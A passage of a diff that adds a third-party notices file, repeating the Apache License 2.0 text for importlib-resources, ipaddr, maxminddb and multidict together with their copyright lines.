+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+importlib-resources 5.4.0 - Apache-2.0
+
+
+Copyright 2017-2019 Brett Cannon, Barry Warsaw
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+ipaddr 2.2.0 - Apache-2.0
+
+
+Copyright 2007 Google Inc.
+Copyright 2008 Google Inc.
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+maxminddb 2.2.0 - Apache-2.0
+
+
+(c) JS Foundation and other contributors
+Copyright JS Foundation and other contributors
+(c) 2009-2012 Jeremy Ashkenas, DocumentCloud Inc.
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable (except as stated in this section) patent license to make, have made, use, offer to sell, sell, import, and otherwise transfer the Work, where such license applies only to those patent claims licensable by such Contributor that are necessarily infringed by their Contribution(s) alone or by combination of their Contribution(s) with the Work to which such Contribution(s) was submitted. If You institute patent litigation against any entity (including a cross-claim or counterclaim in a lawsuit) alleging that the Work or a Contribution incorporated within the Work constitutes direct or contributory patent infringement, then any patent licenses granted to You under this License for that Work shall terminate as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the Work or Derivative Works thereof in any medium, with or without modifications, and in Source or Object form, provided that You meet the following conditions:
+
+      (a) You must give any other recipients of the Work or Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works that You distribute, all copyright, patent, trademark, and attribution notices from the Source form of the Work, excluding those notices that do not pertain to any part of the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its distribution, then any Derivative Works that You distribute must include a readable copy of the attribution notices contained within such NOTICE file, excluding those notices that do not pertain to any part of the Derivative Works, in at least one of the following places: within a NOTICE text file distributed as part of the Derivative Works; within the Source form or documentation, if provided along with the Derivative Works; or, within a display generated by the Derivative Works, if and wherever such third-party notices normally appear. The contents of the NOTICE file are for informational purposes only and do not modify the License. You may add Your own attribution notices within Derivative Works that You distribute, alongside or as an addendum to the NOTICE text from the Work, provided that such additional attribution notices cannot be construed as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and may provide additional or different license terms and conditions for use, reproduction, or distribution of Your modifications, or for any such Derivative Works as a whole, provided Your use, reproduction, and distribution of the Work otherwise complies with the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise, any Contribution intentionally submitted for inclusion in the Work by You to the Licensor shall be under the terms and conditions of this License, without any additional terms or conditions. Notwithstanding the above, nothing herein shall supersede or modify the terms of any separate license agreement you may have executed with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade names, trademarks, service marks, or product names of the Licensor, except as required for reasonable and customary use in describing the origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or agreed to in writing, Licensor provides the Work (and each Contributor provides its Contributions) on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied, including, without limitation, any warranties or conditions of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A PARTICULAR PURPOSE. You are solely responsible for determining the appropriateness of using or redistributing the Work and assume any risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory, whether in tort (including negligence), contract, or otherwise, unless required by applicable law (such as deliberate and grossly negligent acts) or agreed to in writing, shall any Contributor be liable to You for damages, including any direct, indirect, special, incidental, or consequential damages of any character arising as a result of this License or out of the use or inability to use the Work (including but not limited to damages for loss of goodwill, work stoppage, computer failure or malfunction, or any and all other commercial damages or losses), even if such Contributor has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing the Work or Derivative Works thereof, You may choose to offer, and charge a fee for, acceptance of support, warranty, indemnity, or other liability obligations and/or rights consistent with this License. However, in accepting such obligations, You may act only on Your own behalf and on Your sole responsibility, not on behalf of any other Contributor, and only if You agree to indemnify, defend, and hold each Contributor harmless for any liability incurred by, or claims asserted against, such Contributor by reason of your accepting any such warranty or additional liability. END OF TERMS AND CONDITIONS
+
+APPENDIX: How to apply the Apache License to your work.
+
+To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives.
+
+Copyright [yyyy] [name of copyright owner]
+
+Licensed under the Apache License, Version 2.0 (the "License");
+
+you may not use this file except in compliance with the License.
+
+You may obtain a copy of the License at
+
+http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+
+distributed under the License is distributed on an "AS IS" BASIS,
+
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+
+See the License for the specific language governing permissions and
+
+limitations under the License.
+
+---------------------------------------------------------
+
+---------------------------------------------------------
+
+multidict 5.2.0 - Apache-2.0
+
+
+copyright 2016
+
+Apache License
+
+Version 2.0, January 2004
+
+http://www.apache.org/licenses/ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+
+
+      "License" shall mean the terms and conditions for use, reproduction, and distribution as defined by Sections 1 through 9 of this document.
+
+
+
+      "Licensor" shall mean the copyright owner or entity authorized by the copyright owner that is granting the License.
+
+
+
+      "Legal Entity" shall mean the union of the acting entity and all other entities that control, are controlled by, or are under common control with that entity. For the purposes of this definition, "control" means (i) the power, direct or indirect, to cause the direction or management of such entity, whether by contract or otherwise, or (ii) ownership of fifty percent (50%) or more of the outstanding shares, or (iii) beneficial ownership of such entity.
+
+
+
+      "You" (or "Your") shall mean an individual or Legal Entity exercising permissions granted by this License.
+
+
+
+      "Source" form shall mean the preferred form for making modifications, including but not limited to software source code, documentation source, and configuration files.
+
+
+
+      "Object" form shall mean any form resulting from mechanical transformation or translation of a Source form, including but not limited to compiled object code, generated documentation, and conversions to other media types.
+
+
+
+      "Work" shall mean the work of authorship, whether in Source or Object form, made available under the License, as indicated by a copyright notice that is included in or attached to the work (an example is provided in the Appendix below).
+
+
+
+      "Derivative Works" shall mean any work, whether in Source or Object form, that is based on (or derived from) the Work and for which the editorial revisions, annotations, elaborations, or other modifications represent, as a whole, an original work of authorship. For the purposes of this License, Derivative Works shall not include works that remain separable from, or merely link (or bind by name) to the interfaces of, the Work and Derivative Works thereof.
+
+
+
+      "Contribution" shall mean any work of authorship, including the original version of the Work and any modifications or additions to that Work or Derivative Works thereof, that is intentionally submitted to Licensor for inclusion in the Work by the copyright owner or by an individual or Legal Entity authorized to submit on behalf of the copyright owner. For the purposes of this definition, "submitted" means any form of electronic, verbal, or written communication sent to the Licensor or its representatives, including but not limited to communication on electronic mailing lists, source code control systems, and issue tracking systems that are managed by, or on behalf of, the Licensor for the purpose of discussing and improving the Work, but excluding communication that is conspicuously marked or otherwise designated in writing by the copyright owner as "Not a Contribution."
+
+
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity on behalf of whom a Contribution has been received by Licensor and subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of this License, each Contributor hereby grants to You a perpetual, worldwide, non-exclusive, no-charge, royalty-free, irrevocable copyright license to reproduce, prepare Derivative Works of, publicly display, publicly perform, sublicense, and distribute the Work and such Derivative Works in Source or Object form.
+
